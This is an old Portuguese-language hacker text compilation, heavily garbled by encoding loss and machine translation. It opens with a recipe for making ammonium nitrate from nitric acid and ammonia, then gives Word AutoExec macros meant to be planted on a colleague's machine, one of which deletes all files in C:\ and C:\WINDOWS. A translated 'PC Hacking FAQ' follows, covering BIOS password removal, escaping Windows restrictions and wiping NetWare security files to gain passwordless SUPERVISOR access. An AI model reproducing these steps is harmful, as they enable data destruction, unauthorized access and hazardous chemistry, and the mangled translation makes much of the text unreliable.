	Faa isso num lugar aberto e bem ventilado pois sÆo exalados gases t¢xicos. Encha o frasco com µcido N¡trico e coloque-o na bacia com gelo. Despeje a amnia no frasco e saia de perto. IrÆo ocorrer reaäes e uma grande liberaÆo de gases. Por volta de meia depois, retire o frasco do gelo e deixe-o no sol para secar. O p¢ que se formar   Nitrato de Amnia. Guarde em um pote hermeticamente fechado pois este tipo de substncia tende a absorver  gua do ar.

TABELA DE EQUIVALÒNCIA


Nome - Ingls			Nome - Portugus			Equivalente

acetic acid			 cido actico				vinagre
aluminum oxide		¢xido de alum¡nio			al£men
aluminum potassium sulfate	sulfato de pot ssio de alum¡nio	pedra-ume
aluminum sulfate		sulfato de alum¡nio			pedra-ume
ammonium hydroxide		hidr¢xido de amnia			amnia
carbon carbonate		carbonato de carbono			giz
carbon tetrachloride		tetracloreto de carbono		removedor
calcium hypochloride		hipocloreto de c lcio			sap¢lio
calcium oxide			¢xido de c lcio			cal
calcium sulfate		sulfato de c lcio			gsso
carbonic acid			 cido carbnico			 gua de soda
ethylene dichloride		bicloreto de etileno			flu¡do alemÆo
ferric oxide			¢xido frrico				ferrugem
glucose			glicose					xarope de milho
graphite			grafite					ponta de l pis
hydrochloric acid		 cido clor¡drico			desinfetante
hydrogen peroxide		per¢xido de hidrognio		per¢xido
lead acetate			acetato de chumbo			sal de chumbo
lead tetroxide			tetr¢xido de chumbo			chumbo
magesium silicate		silicato de magnsio			talco
magesium sulfate		sulfato de magnsio			Sal de Epsom
naphthalene			naftalina				bola de naftalina
phenol				fenol					 cido fnico
potassium bicarbonate	bicarbonato de pot ssio		creme adstringente
potassium chromium sulfate	sulfato de cromo de pot ssio		al£men cromo
potassium nitrate		nitrato de pot ssio			salitre
sodium dioxide		di¢xido de s¢dio			areia
sodium bicarbonate		bicarbonato de s¢dio			soda quente
sodium borate			borato de s¢dio			b¢rax
sodium carbonate		carbonato de s¢dio			soda de lavagem
sodium choride		clorito de s¢dio			sal
sodium hydroxide		hidr¢xido de s¢dio			lix¡via
sodium silicate			silicato de s¢dio			vidro sol£vel
sodium sulfate			sulfato de s¢dio			Sal de Glauber
sodium thiosulfate		tiossulfato de s¢dio			hipossulfito (fotos)
sulferic acid			 cido sulfrico				 cido de bateria
sucrose			sacarose				cana de a£car
zinc choride			clorito de zinco			tiner

O autor nÆo  respons vel pelos atos de seus leitores. Corra seus pr¢prios riscos.

Virus

4.1 - V¡rus

      V¡rus  um programa independente que se auto reproduz. Ele ir  se aclo-
par em outros programas e fazer c¢pias de si mesmo espalhando-se pelo win-
chester. O intuito do v¡rus  destruir o corruptar informaäes do disco r¡gi-
do ou baixar o rendimento do micro rodando programas maiores que a mem¢ria
dispon¡vel. Antiv¡rus, s¢ retiram os v¡rus que eles forem programados. Nenhum
programa pode o proteger 100 % de v¡rus, pois a cada momento estÆo sendo fa-
bricados novos v¡rus em qualquer parte do mundo.

4.2 Trojan Horse (Cavalo de Tr¢ia)

      O cavalo de tr¢ia  um programa que, como o v¡rus, se aclopa em um 
arquivo do winchester de um microcomputador infectado. Eles tem o intuito de
roubar informaäes preciosas como passwords ou logins e, depois, envi -las a
seu "dono"pela network automaticamente. Alguns antiv¡rus retiram os Trojans
outros nÆo, mas nenhum retira todos.

Worm

      Worm  o tipo de programa mais inteligente j  criado. Ele nÆo s¢ se 
espalha pelo computador e espera pela sorte de infectar outro atravs de um
disquete contaminado, ele tem o poder de se espalhar por toda a network. Os
worms podem infectar toda uma rede de sistemas e fazer nelas um bom estrago.

V¡rus de Macro

Ainda hoje existe  muita gente que so eh  capaz de abrir o  word,  editar,
  negritar, sublinhar e  mandar  para impressora, muitos, milhares so sabem
  mexer  no basico  mesmo. Eles nem  imaginam o  que  tem  por  traz  deste
  riquissimo processador de texto.

  Esta materia tem como objetivo fazer desde pequenas ate grandes sacanagens
  com usuarios pentelho.

  ps: Software/versao Abrangido: Word da Microsoft, versoes 6 (win3.11) e
  7.0 (win95)


  O Word  possui  um  arquivo  chamado  "normal.dot"  onde  estao  todas  as
  configuracoes padrao do word.Se por algum motivo este arquivo for deletado
  o Word cria automaticamente quando for inicializado.

  Niveis de sacanagem
  Nivel 1..... Apenas uma brincadeira
  Nivel 2..... Apenas uma brincadeira de mau gosto
  Nivel 3..... Nao eh mais brincadeira.

  Primeiro voce precisa criar uma macro... siga os passos:
  Entre no Word, feche a  janela de  documento, nao deixe  nenhum documento
  aberto(ativo), clique em Arquivo(File) depois  Macro, coloque  no nome da
  macro "AutoExec"(obrigatorio) esta  macro eh  inicializada toda vez que o
  Word for iniciado, depois  clique em 'Criar', delete  as duas  linhas que
  tiver la (Sub MAIN e End Sub) e cole a  rotina que  tem logo mais abaixo.

  ps: existe outras formas/meios d criar uma macro,mas esta eh mais simples.


  * Nivel 1
  O nivel 1 serve  para voce se mostrar, falando que entende do Word melhor
  do que ninguem.
  Cada vez que  o usuario  inicia o Word recebera uma mensagem... de  alerta
  ou qquer outro coisa que sair da sua mente. veja abaixo.

  v------[corte aqui-begin]-------v
  Sub MAIN
  MsgBox "Voce  um pentelho!  Eu nÆo irei prosseguir com o sistema", "Microsoft Word", 5
  MsgBox "Usu rio Pirata Detectado", "FATAL ERROR", 16
  MsgBox "JAMES BOND 007 ", "007 na estrada Digital", 64
  End Sub
  ^------[corte aqui-end]-------^


  - Nivel 2
  Eh para deixar o usuario irritadissimo.
  no corpo da macro cole este texto abaixo:

  v-----[corte aqui-begin]-------v
  Sub MAIN
  ArquivoNovoPadrÆo
  Inserir "James"
  ArquivoNovoPadrÆo
  Inserir "Bond"
  ArquivoNovoPadrÆo
  Inserir "007"
  ArquivoNovoPadrÆo
  Inserir "James Bond 007 Na Estrada digital "
  ArquivoNovoPadrÆo
  Inserir "."
  ArquivoNovoPadrÆo
  Inserir "."
  ArquivoNovoPadrÆo
  Inserir "."
  ArquivoNovoPadrÆo
  Inserir "."
  ArquivoNovoPadrÆo
  Inserir "."
  ArquivoNovoPadrÆo
  Inserir "."
  ArquivoNovoPadrÆo
  Inserir "."
  ArquivoNovoPadrÆo
  Inserir "."
  ArquivoNovoPadrÆo
  Inserir "."
  ArquivoNovoPadrÆo
  Inserir "."
  ArquivoNovoPadrÆo
  Inserir "."
  ArquivoNovoPadrÆo
  Inserir "."
  ArquivoNovoPadrÆo
  Inserir "."
  ArquivoNovoPadrÆo
  Inserir "."
  ArquivoNovoPadrÆo
  Inserir "James Bond 007 Na Estrada digital "
  End Sub
  ^------[corte aqui-end]-------^

  Repita as linhas

    ArquivoNovoPadrÆo
    Inserir "."

  Quantas vezes quiser, pois o resultado sera dezenas de arquivos aberto,
  irritando o usuario, com a mensagem de falta de memoria.
  ps: acho que o limite eh de 69 arquivos aberto, depente muito do conteudo
  dos arquivos, de for somente '.' acho que da no maximo 69 arquivos.


  - Nivel 3
  Bom este nivel eh  pura sacanagem,com ele um simples clicar* do mouse, e
  tudo desaparece! isto  mesmo "del *.*" ou apenas os documentos, voce  eh
  quem sabe.

  v-----[corte aqui-begin]-------v
  Sub MAIN
  Kill "C:\*.*"
  Kill "C:\WINDOWS\*.*"
  Kill "C:\WINWORD\*.*"
  End Sub
  ^-----[corte aqui-end]-------^


  Lembre-se de que estes macros, sao gravado no arquivo default do word, ou
  seja  no  'normal.dot'  se  este   arquivo  for   deletado, o  Word  cria
  automaticamente na inicializacao,entao se voce for fazer estas sacanagens
  ai acima, proteja este arquivo, com o comando 'attrib +r'.

  Detalhes:
  . Existe uma forma de iniciar o Word, sem q inicialize a macro 'AutoExec'
    mas nao irei falar, descubra voce mesmo.
  . A macro do word eh uma ferramenta riquissima, procure fucar.
  . Voce  pode  fazer  estas no  seu proprio  computador(so cuide!), salvando
    sempre no arq. "normal.dot"  depois copie apenas este arquivo para aquele
    seu colega/amigo pentelho e saie de perto, para nao explodir em voce.
  . Nao me responsabilizo por qquer ato.



Dicas

	Bem, chegamos a melhor parte. Nesta seÆo eu tentei colocar bastante dicas, algumas dicas e tirei de b¡blias hackers(em ingls), e traduzi com um programa tradutor, portanto, pode nÆo haver certas concordncias, porque herrar  umanu.

DOS
  - Compactador PKZIP - Alguns comandos para quem AINDA nao sabe.
    para compactar com senha
    # pkzip nome *.* -sSENHA     (observe q a opcao -s tem q estar
                                  junto/grudada com sua senha)
    para descompactar:
    # pkunzip nome.zip -sSENHA

    para compactar sub-diretorios
    # pkzip nome *.* -p -r

    para descompactar e abrir o(s) subdiretorio(s)
    # pkunzip nome.zip -d

                                ---

  INTERNET(1)
  - se seu provedor nao tiver um servidor se newsgroup proprio, vc pode
    acessar a este de uso publico 'news.rdc.puc-rio.br'

                                ---

  Windows95/Internet
  - o windows95 possui um prog. de FTP para DOS. ou seja vc pode entrar
  em servidores FTP em modo caracter, como se estivesse usando o proprio
  unix. Quando vc estiver conectado a rede, abra uma secao DOS e
  digite FTP mais o endereco, ex: 'ftp 200.248.224.10'
  depois de conectado digite '?' para ver os comandos, para lista-los
  use 'dir' - para puxar/baixar arq's use o comando 'mget' mais o arquivo
  e para mandar use o 'mput' seguido o arquivo.
  mensagem/exemplo:

  c:\windows>ftp 200.255.216.5
  Connected to 200.255.216.5.
  220 net FTP server (Version wu-2.3(1) Tue Dec 24 23:51:15 CST 1993) ready.
  User (200.255.216.5:(none)): anonymous
  Password:
  ...



  INTERNET(2)
  - Alguns servidores para visitar:
    FTP
    Provedor   -> 200.248.215.210
    Provedor   -> 200.248.224.10
    Banco Itau -> 200.246.143.1
    ...        -> 200.246.45.1
    ...        -> 129.29.64.246

    TELNET
    Nyx        -> 130.253.192.68


    ps: para acessar os servidor FTP utilize como user 'anonymous' e a senha
        varia: uns eh soh dar um ENTER e outros eh soh colocar 'joao@'
        em seguida teclar ENTER.


                     ==------------------== 
                       O PC Hacking FAQ 
                     ==------------------== 

                      VersÆo 1.5 3/17/96 

----------------------------------------------------------------Escrito Por 
Olcay Cirit, <olcay@libtech.com>----------------------------------------------------------------RETRATAÇO: O autor deste texto nega toda a 
obrigaÆo tudo que relativo ao and/or de uso abuse das tcnicas esboadas aqui 
ou qualquer dano incorreram thereof diretamente ou indiretamente.  


                       Öndice 
                     - = - = - = - = - = - = - = - = - = - = - 
                  X. IntroduÆo 
                  1. Hardware e Firmware 
                      um. O BIOS 
                           Contra-senhas 
                           Resetting o CMOS 
                      b. Fechaduras moles 
                           Os escolhendo 
                           Os comprando 
                      c. Por £ltimo Recursos 
                           ExtraÆo de disco r¡gido 
                  2. DOS, Windows, e Netware 
                      um. Acesso adquirindo para DOS 
                           Calce as botas de um disquete 
                           Arquivos de startup de estrada de contorno 
                           Evite DriveSpace 
                           Fuja de Autoexec.bat 
                      b. Passando De Windows 
                           Filtre os Poupadores 
                           ProteÆo de contra-senha 
                           DOS Usando Escrevem  
                           DOS Using Palavra 
			   DOS por MODO 
                      c. Passando De Netware 
                           Nomes de Conta comuns 
                           Resetting Netware 
                  3. Construindo um sistema seguro 
                      um. Entendendo os Assuntos 
                           Hackers " potencial " 
                           Segurana f¡sica 
                           Segurana de software 
                           Contra-senhas 

---------------------------------------------------------------- 

X. IntroduÆo 

Este FAQ descreve como para rombo para um PC (IBM-compat¡vel)  
do exterior em, e como evitar a maioria software-baseado 
medidas de segurana. A £ltima seÆo detalha como afianar seu 
PC contra tal ataca. 

Hi e Ho  vai fora para: KORO o Grande, Neil Chou, John,  
Lundgren e esses Netware Hackers realmente fresco! [Parte 2c (Adquirindo  
Netware passado) est  baseado em partes do Netware Hacking FAQ!] 

Por que eu escrevi isto? Porque h  pouco havia tantos  
perguntas em alt.2600 que concernem ' Como faa eu passo de XXXXX  
segurana? ' que eu me cansei de responder cada um  
individualmente. Espere ver para este FAQ se expandir como eu acho mais  
bichos e buracos em software de segurana. 

Muitas destas soluäes assumem voc tem acesso f¡sico para 
o PC. Por exemplo, voc nÆo pode extrair o disco r¡gido ou 
reajuste o CMOS em cima de uma cadeia, mas voc pode fazer isto se voc 
tenha acesso ao computador. 

Este FAQ  *NOT * escrito para ajudar thiefs de computador, mas bastante 
 pretendido que aumenta conscincia de backdoors e 
inefficiencies em programas de segurana. Eu nÆo TOLERO  
ESTRAGANDO OUTROS COMPUTADORES de PEOPLES' NADA!!!!!!  

Talvez depois do ler para isto nÆo confie o non-existente  
segurana oferecida como muito por Windows 95. 

Eu gostaria de notar que poucos destes truques  novo. Eu 
simplesmente reunido tudo o que eu poderia achar e  
o no qual eu poderia respigar de experincia pessoal um 
arquivo organizado. 

Se voc tem qualquer pergunta ou coment rios, sinta livre para me contactar. 

Tambm, espere ver uma versÆo disto para o Macintosh, 
algum dia... :) 

	Tenha Phun, 

	Olcay Cirit, <olcay@libtech.com>  
	a.k.a, Pensamento Fundo, 

---------------------------------------------------------------- 

1. Hardware e Firmware 

1a. O BIOS 

Contra-senhas 
== == == == = 
O BIOS, pequeno para Servios de Input/Output B sicos,  o programa de controle 
do PC.  respons vel para comear seu computador e transfere controle do 
sistema para seu sistema operacional, e  
por dirigir outras funäes de baixo n¡vel, como acesso de disco. 

NOTA que o BIOS nÆo  um programa de software, insofar como  
nÆo purgado de mem¢ria quando voc vira o computador.   
firmware, s¢  permanentemente e unchangeably armazenaram em 
a m quina. 

Uma pequena caracter¡stica conveniente que a maioria dos fabricantes de BIOS 
inclui 
 uma contra-senha de startup. Isto previne acesso para o sistema at 
voc entra na contra-senha correta.  

Se voc pode adquirir acesso para o sistema depois da contra-senha foi entrado, 
entÆo h  numerosos BIOS contra-senha extratores software-baseados dispon¡vel 
de: 

ftp://oak.oakland.edu/simtel/msdos/sysutil/amis2990.zip 


Resetting o CMOS 
== == == == == == == == == 
H  s¢ um outro modo para passar da contra-senha de BIOS.  
Envolve descarregando a mem¢ria est tica (CMOS) armazenava a contra-senha e 
outra informaÆo de sistema. Uma vez  descarregado,  
porm, voc tem que reajustar todas as colocaäes de sistema  mÆo. 

* * * *Follow estes passos: 

	 1. Comece o computador 
		um. Se o sistema permite isto, entre na Tela de LigaÆo 
			(Normalmente apertando F1, DEL ou INS durante  
			o cheque de mem¢ria) 
		b. Registre toda a InformaÆo de LigaÆo. Cheque dobro. 
	 4. Vire o computador 
	 5. Remova a cobertura, e ponha o computador no solo em 
		tal um modo que voc pode ver e pode ter acesso o lado de  
		o motherboard com o processador nisto. 
	 6. Olhe o motherboard.  
		um. Se voc pode ver um c¡rculo, disco-como bateria, entÆo, 
			remova, e deixe o computador se sentar sem  
			a bateria durante 15-30 minutos. Ponha a bateria  
			atr s em. 
		b. Se voc tem acesso ao circuito esquematiza para o 
			motherboard, olhe neles para a contra-senha ou 
			Saltador de CMOS. Sacuda de tempo em tempo. 
		c. Procure um azul, soldar-em bateria com um saltador 
			escapando disto. Este saltador  por conectar 
			uma bateria externa. Arranque para reajustar o 
			CMOS. 
	 9. Substitua a cobertura de computador. 
	10. Entre na Tela de LigaÆo, e fixe a InformaÆo de LigaÆo 
		atr s para os valores originais que voc (esperanosamente) 
		registrado. Se voc estivesse impossibilitado registrar este info, 
		entÆo voc h  pouco ter  que montar isto manualmente. 
		[NOTA: Alguma Tomada mais nova & Jogo BIOSes tm um  
		caracter¡stica de autodetect que automaticamente jogo-para cima o 
		disco r¡gido. Olhe ao redor de nos artigos de card pio no 
		LigaÆo de BIOS.] 

Novamente, eu gostaria de mencionar que h  numerosos extratores de contra-senha 
dispon¡vel para livre fora o internet e em BBSes. Tente esses primeiro. Eles 
estÆo muito mais limpos e f cil-para-usam. 

---------------------------------------------------------------- 

1b. Fechaduras moles 

Fechaduras moles sÆo inseräes de pl stico geralmente baratas nas que engancham 
 
para o dentro do passeio e fecha isto e lhe impede assim de usar o passeio 
mole. As fechaduras usadas normalmente sÆo esses pequeno 
rode fechaduras usadas em coberturas de computador para fechar o teclado. 

Se a fechadura  o rode tipo, voc ou pode escolher isto, ou 
compre uma chave (eles sÆo todos o mesmo). 

Para escolher isto, voc precisar  de um *thin * chave de fenda de flathead 
ou um paperclip. Escolher a fechadura, leve o paperclip e insira no pequeno 
entalhe no lado de dentro do rode fechadura. Agora, puxe ao lado oposto da 
fechadura at o rode est  na posiÆo destrancada. 

Se voc escolhe comprar uma chave, voc pode: 

	Um. V  para seu centro de servio de computador local, e compra 
		um destas chaves. (Muito barato. Freqentemente menos que 
		$0.75) 
	B. Compre a mesma marca de fechadura mole, e use a chave 
		isso vem com isto. 

---------------------------------------------------------------- 

1c. Por £ltimo Recursos 

Se voc  *REALLY * desesperado a rombo para este PC, entÆo,  
o *might seguinte * trabalho: 

	1. Remova a Cobertura de PC 
	2. Extraia o disco r¡gido (desparafusando e desconectando) 
	3. Transfira para outro computador. (Tem certeza que  
		NÆo fixe como o passeio de bota.) 
	4. Comece este computador, e tenha acesso o 
		disco r¡gido de l . 

Isto provavelmente nÆo trabalhar  se um sistema de arquivo codificado  em 
uso. O £nico modo para ter acesso tais discos  entrar na contra-senha,  
ou entende um modo para decifrar isto, assim se voc esquece de sua 
contra-senha, voc  hosed. : ( 

---------------------------------------------------------------- 

2. DOS, Windows, e Netware 

2a. Acesso adquirindo para DOS 

Com alguns sistemas, eles sÆo diretamente fixos at bota para algum tipo  
de programa de shell/security, como Windows, ou Windows 95. Se voc 
queira adquirir acesso para um lembrete de DOS, voc tem algumas escolhas: 

	Um. Calce as botas de um disquete 
	B. Arquivos de startup de estrada de contorno 
        C. DriveSpace evitando 
	D. Fuja de Autoexec.bat 

* * *Booting de um disquete lhe exige que crie um disco de sistema.  
Voc pode fazer isto usando o DOS comando FORMATO /S que vai  
formate um disco e lugar arquivos de sistemas nisto. Tambm, o Windows  
formato tem uma opÆo que lhe permite criar um disquete de sistema. 

Antes de voc crie um disco de sistema, voc tem que determinar que 
passeio mole  usado para calar as botas. Se o sistema tem ambos um 
1.2MB (5.25 ") Passeio mole e uns 1.44MB (3.5 ") Dirija,  prov vel 
que o passeio de bota  o 1.2 MB passeio mole. Se o computador 
tem s¢ um passeio mole, est  bastante seguro assumir que  
o passeio de bota. 

Porm, se voc  inseguro sobre qual passeio  o passeio de bota, 
voc ou pode descobrir entrando em LigaÆo De sistema (como descreveu 
em seÆo 1) ou observando qual passeio mole  lido direito 
antes das cargas de sistema operacional. 

Se o sistema  fixado s¢ calar as botas do disco r¡gido, entÆo voc, 
possa se referir a SeÆo 1 em como reajustar o CMOS. 

Uma vez voc tem um disco de sistema, voc coloca isto no passeio mole, 
e vira em ou reajustou o computador. Se voc fez tudo 
corrija, o computador calar  as botas do passeio mole e voc vai 
tenha acesso a um lembrete de DOS. 

* * *Bypassing startup arquivos sÆo bastante simples, mas s¢ trabalha em  
versäes de DOS 6.0 ou melhor e Windows 95. Quando voc vira em  
o computador e voc vem o texto: 

	MS-DOS comeando... 

ou 
	PC-DOS comeando... 

ou  
	Windows 95 comeando... 

Imprensa e segura a TROCA ou F5 chave IMEDIATAMENTE. Isto evitar   
o startup arquiva (CONFIG.SYS e AUTOEXEC.BAT) contanto que o  
administrador de sistema nÆo incapacitou esta caracter¡stica. 

Adicionalmente, voc pode apertar e pode segurar F8 quando o startup  
texto mostra para entrar no card pio de Bota. Isto o deixa selectively 
incapacite certos comandos, ou evite o startup totalmente arquiva, 
entre outras coisas. 

* * *Bypassing DriveSpace trabalha se software de compressÆo como DriveSpace ou 
DoubleSpace foi instalado. Nesse caso, quando 
o texto de startup exibe, imprensa e segura Ctrl+F5 ou Ctrl+F8. 
Isto carregar  o sistema sem carregar a compressÆo 
motorista que o quer dizer nÆo pode ter acesso os arquivos em disco.  

PORM, voc pode descompressar o disco (DriveSpace s¢), ou, 
se todo outro falha, formate. 

* * *Breaking fora de AUTOEXEC.BAT tambm  bastante simples. Quando o 
computador comea e o sistema operacional comea carregando, imprensa 
Ctrl+Break (Ou Ctrl+C) repetidamente. Quando o AUTOEXEC.BAT executa, isto 
terminar  isto e o derrubar  para DOS. Isto trabalhar  a menos que 
o administrador De sistema temporariamente inv lido o teclado. 

---------------------------------------------------------------- 

2b. Obtendo a DOS de Windows 

Se as acima de t ticas falham, e a m quina automaticamente cargas 
Windows, entÆo voc ainda tem uma chance de adquirir a DOS. Windows 
atravs de falta d  voc livra acesso para DOS. H  segurana especial programa 
para impedir para o usu rio de ter acesso DOS. A maioria destes 
pode ser evitado. 

Filtre os Poupadores 
== == == == == == = 
A proteÆo de contra-senha embutido a Windows 3.1  extremamente fraco. 
Voc pode evitar isto editando CONTROL.INI simplesmente e procurando  
o campo de Contra-senha. Apague o jogue fora isso aparece depois o igual 
sinal. 

A proteÆo de contra-senha em Windows 95  muito mais forte, mas voc ainda 
pode evitar isto por *carefully * movendo ou mencionando novamente todos os 
arquivos de .PWL  
no diret¢rio de C:\Windows. 

ProteÆo de contra-senha 
== == == == == == == == == = 

Q: Windows comea, e voc  apresentado com contudo outro  
	caixa de di logo de contra-senha. O que fao eu? 

Um: 
* *If estes  o Windows Logon Prim rio ou um logon de Cadeia, entÆo voc 
normalmente pode passar disto apertando o botÆo de Cancelamento (Nenhuma 
Piada!). 
Isto  porque a informaÆo de Logon  principalmente usada para preferncia de 
mesa e arquivo compartilhar distante. 

* *If este  um programa de segurana de tero-festa, como o um embutido para 
Depois de EscuridÆo, tente Ctrl+Alt+Del urgente quando o di logo  
apresentado a voc. A maioria para o que programas de segurana saem do modo 
deles/delas 
esteja seguro, e Windows 3.1 interpreta isto como nÆo respondendo  
o sistema, e assim permitir  voc fecha isto. Windows 95 aparece 
uma pequena caixa de di logo limpa que o deixa termina qualquer aplicaÆo de 
funcionamento. Como conveniente. :) Uma vez voc subverte isto, voc pode 
impea do aborrecer novamente editando a CARGA = e  
CORRA = seäes em C:\WINDOWS\WIN.INI. 

Q: Windows comea, e o gerente de programa carrega, mas o card pio de Arquivo 
	 inv lido, e assim  DOS e Gerente de Arquivo. Como possa eu tenho acesso 
	DOS??? 

Um: H  muitos programas de Segurana para Windows (3.1 *AND * 95) isso  
	faa isto, e outras coisas. H  alguns modos ao redor deles: 

* *Try este primeiro:  

DOS por Escreva 
== == == == == == == == = 
	1. Entre em Acess¢rios, e comee o Word  (ou Wordpad) 
		NÇO, eu nÆo REPITO, NOTEPAD!! 
	2. abra C:\COMMAND.COM 
	3. Um pouco caixa de di logo aparecer . NÆo selecione NENHUMA CONVERSÇO 
	4. Selecione Economize Como... 
	5. Salve como C:\WINDOWS\WINHELP.EXE 
	6. Se pergunta que se voc quer escrever elaboradamente WINHELP.EXE, escolhe 
		SIM 
	7. Aperte F1. Normalmente, isto carrega Ajuda de Windows, mas agora isto 
		crie um DOS janela pronta. 

* *Try este pr¢ximo: 

DOS por Palavra 
== == == == == == == == 
	1. Se eles tm Palavra de Microsoft instalada, comea. 
	2. Do Card pio de Ferramentas, Macro seleto. 
	3. Digite em um nome de Macro, e clique " Crie " 
	4. Quando a janela de Macro surge, digite em um do 
		seguindo dependendo em qual Windows que voc est  usando: 

		  Para Windows 3.1: Concha Environ $(COMSPEC ")  
		  Para Windows 95: Concha Environ $(" COMANDO ")  
		  Para Windows NT: Concha Environ $(CMD ") 

		Se todo outro faltas: Concha " C:\COMMAND.COM " 

	5. Corra o macro apertando o pequeno botÆo de jogo no 
		toolbar de macro. Isto lanar  um lembrete de DOS. 

* *If voc est  usando Windows 95, tente isto: 

DOS por MODO 
== == == == == == == == 
Quando Windows 95 Fecha e espet culos que gr fico mudo,  
realmente h  pouco se sentando em cima de DOS. Voc pode emitir DOS de fato 
comandos (embora o gr fico os cobrir ) no sistema  
depois de paralisaÆo de empresas!! 

Um modo simples para fazer isto  digitar: 

CLS 

Depois que os espet culos gr ficos. Porm, o texto estar  em 40-column 
modo que  duro ler e incompat¡vel com alguns programas. 

Se voc quer adquirir um lembrete de DOS agrad vel, limpo, voc pode digitar: 

	MODO CO80 

Este testamento reajustou a exibiÆo de tela para normal (80-column,  
16 cor) modo. 

Desde *MOST * Windows Segurana programas estÆo baseado em um VxD, eles,  
ser  descarregado (junto com Windows) depois de paralisaÆo de empresas, 
partindo  
voc livra para explorar usando DOS. 

---------------------------------------------------------------- 

2c. Passando de NetWare 

Esta seÆo est  baseado em excerto do Netware Hacking FAQ. 

Nomes de Conta comuns 
== == == == == == == == == == 
Novell Netware tem as contas de falta seguintes: SUPERVISOR, CONVIDADO, e 
Netware 4.x tem ADMIN e USER_TEMPLATE como bem. Tudo estes nÆo tm nenhum jogo 
de contra-senha. S¢ um bobo deixaria o SUPERVISOR e ADMIN considera 
desprotegido, assim voc pode bem nÆo como prova. Porm, muitos administradores 
criarÆo contas de especial-prop¢sito que tm f cil-para-suposiÆo nomeia, 
alguma sem contra-senha nada. Aqui est  alguns do comum e os prop¢sitos t¡picos 
deles/delas: 

Prop¢sito de conta 
---------------------------------------------------------- POSTO que Prende a 
um segundo servidor para email 
CORREIO 

IMPRESSÇO que Prende a um segundo servidor por imprimir 
LASER 
HPLASER 
IMPRESSORA 
LASERWRITER 

ESCAVADOR que Prende um escavador de email ao servidor 

Maio POSTERIOR tem restriäes de password/station (veja abaixo), WANGTEK		usado 
por apoiar o servidor a uma unidade de fita 
		prendido ao workstation. Para auxilio completos,  
		Equivalncia de supervisor  requerida. 

TESTE UM usu rio de teste responda por uso de temp 

ARQUIVISTA Palindrome omite conta para auxilio 

CHEY_ARCHSVR Uma conta para Arcserve para login para o servidor de     		do 
consolo para auxilio de fita. VersÆo 5.01g's 
		contra-senha era TERRA MARAVILHOSA. 

PORTAL que Prende uma m quina de portal ao servidor 
PORTÇO 

FAC-SÖMILE que Prende uma unidade de modem de fac-s¡mile dedicada  cadeia 
FAXUSER          
FAXWORKS         

WINDOWS_PASSTHRU Embora nÆo exigido, pela Microsoft Win95 		Recurso Kit, Ch. 9 
pg. 292 e Ch. 11 pg. 401 voc 
		precise disto para recurso que compartilha sem uma contra-senha. 



Resetting Netware 
== == == == == == == == = 
Quando NetWare  instalado primeiro, o SUPERVISOR de conta e CONVIDADO 
permanece desprotegido, quer dizer, sem contra-senha. SUPERVISOR tem 
corrida gr tis do sistema. Voc pode fazer qualquer coisa que voc quer. 

Mas como possa voc faz o servidor pensar que h  pouco foi instalado sem 
reinstalar o servidor de fato e perder todos os dados em  
o disco? Simples. Voc h  pouco apaga os arquivos que contm o  
sistema de segurana!  

Em Netware 2.x, toda a informaÆo de segurana  armazenada em dois arquivos 
(NET$BIND.SYS e NET$BVAL.SYS). Netware 3.x lojas que informaÆo em trs 
arquivos (NET$OBJ.SYS, NET$VAL.SYS e NET$PROP.SYS). O todo o Netware novo 4.x 
lojas de sistema todo o login nomeia e contra-senhas em cinco arquivos 
diferentes (PARTITIO.NDS, BLOCK.NDS, ENTRY.NDS, VALUE.NDS,  
e UNINSTAL.NDS [Este £ltimo arquivo pode nÆo estar l , nÆo preocupa]). 

Embora Novell fez um mesmo trabalho bom que codifica contra-senhas, eles 
deixaram toda a informaÆo de diret¢rio f cil de achar e mudar se voc pode ter 
acesso o disco do servidor diretamente e pode usar utilidades comuns como o 
Disco de Norton Edite.  

Usando esta utilidade como um exemplo, eu darei um passo por passo procedimento 
para fazer estes arquivos desaparecer. Tudo voc necessidade  um bootable 
disco de DOS, o Disco de Emergncia de Utilidades de Norton que contm o 
DiskEdit programa e algum tempo perto do servidor. 

1. Calce as botas em o servidor e vai para o lembrete de DOS. Fazer isto, h  
pouco deixe a cadeia normalmente e entÆo calar as botas use o ABAIXE e 
comandos de SAÖDA. Este procedimento nÆo trabalha em Netware velho 2.x 
servidores e em algumas instalaäes onde DOS foi removido de mem¢ria. Nesses 
casos, voc ter  que usar um DOS bootable disco. 

2. Corra a utilidade de DiskEdit de Norton de passeio UM: 

3. Ferramentas " seletas " no card pio principal e entÆo ConfiguraÆo " seleta 
".  
   · janela de configuraÆo, uncheck o " checkbox Somente de leitura ". E tem 
muito cuidado com tudo voc digita depois deste ponto. 

4. Objeto " seleto " e entÆo " Passeio ". · janela, selecione o C: dirija e 
tenha certeza voc confere o botÆo " passeio " f¡sico. Isso voc estar  
cuidando a seu disco f¡sico e voc pode ver  
   (e mudana) tudo nisto. 

5. Ferramentas " seletas " e entÆo " Achado ". Aqui, voc entrar  no nome do 
arquivo que voc est  tentando para achar. Use " NET$BIND " para Netware 2, 
NET$PROP.SYS " para Netware 3 e " PARTITIO.NDS " para Netware 4.  poss¡vel que 
voc ache estes fios em um lugar que nÆo  o diret¢rio de Netware. Se os nomes 
de arquivo nÆo sÆo todos perto de um ao outro e proportionaly separaram por 
alguns c¢digos ileg¡veis (pelo menos 32 bytes entre eles), entÆo voc nÆo  o 
lugar para o que n¢s estamos olhando. Naquele caso, voc ter  que continuar 
procurando selecionando " Ferramentas " e entÆo " Achar novamente ". [Em 
Netware 3.x, pode mudar voc todo o occurences da oficina de encadernaÆo 
arquiva e ainda deveria trabalhar aprovadamente]) 

6. Voc achou o diret¢rio e voc est  pronto mudar isto. Em vez de apagar os 
arquivos, voc estar  os mencionando novamente. Isto evitar  problemas com o 
diret¢rio estruture (gosta de cadeias GORDAS perdidas). S¢ tipo " VELHO " em 
cima do SYS " existente " ou " extensÆo de NDS ". Tenha extremamente cuidado e 
nÆo mude qualquer outra coisa. 

7. Ferramentas " seletas " e entÆo " Acha novamente ". Considerando que Netware 
armazenam a informaÆo de diret¢rio em dois lugares diferentes, voc tem que 
achar a outra c¢pia e mudar isto o mesmo modo. Isto prevenir  problemas de 
estrutura de diret¢rio novamente. 

8. Encerre Disco de Norton Edite e calce as botas em o servidor novamente. Se 
voc est  correndo Netware 2 ou 3, seu servidor j  seria acess¡vel. H  pouco v  
para qualquer estaÆo e anote em como Supervisor de usu rio. Nenhuma 
contra-senha ser  perguntada.     Se voc est  correndo Netware 4, h  um £ltimo 
passo. 

9. Carregue Netware 4 instalam utilidade (s¢ CARGA de tipo INSTALA ao lembrete 
